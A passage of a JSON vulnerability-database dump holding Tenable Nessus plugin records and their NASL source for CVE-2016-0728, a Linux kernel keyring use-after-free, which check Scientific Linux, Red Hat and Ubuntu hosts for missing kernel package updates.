\"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:49:07", "description": "* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nThe system must be rebooted for this update to take effect.", "edition": 17, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-26T00:00:00", "title": "Scientific Linux Security Update : kernel on SL7.x x86_64 (20160125)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-26T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-tools", "p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs"], "id": "SL_20160125_KERNEL_ON_SL7_X.NASL", "href": 
"https://www.tenable.com/plugins/nessus/88174", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88174);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL7.x x86_64 (20160125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. 
(CVE-2016-0728, Important)\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1601&L=scientific-linux-errata&F=&S=&P=11419\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3869eafb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", 
reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:06:07", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-26T00:00:00", "title": "RHEL 7 : kernel (RHSA-2016:0064)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", 
"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88173", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0064. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88173);\n script_version(\"2.16\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0064\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2016:0064)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0728\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:0064\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0064\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security 
advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\n\n if 
(rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:29:21", "description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-2870-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2870-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2870-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
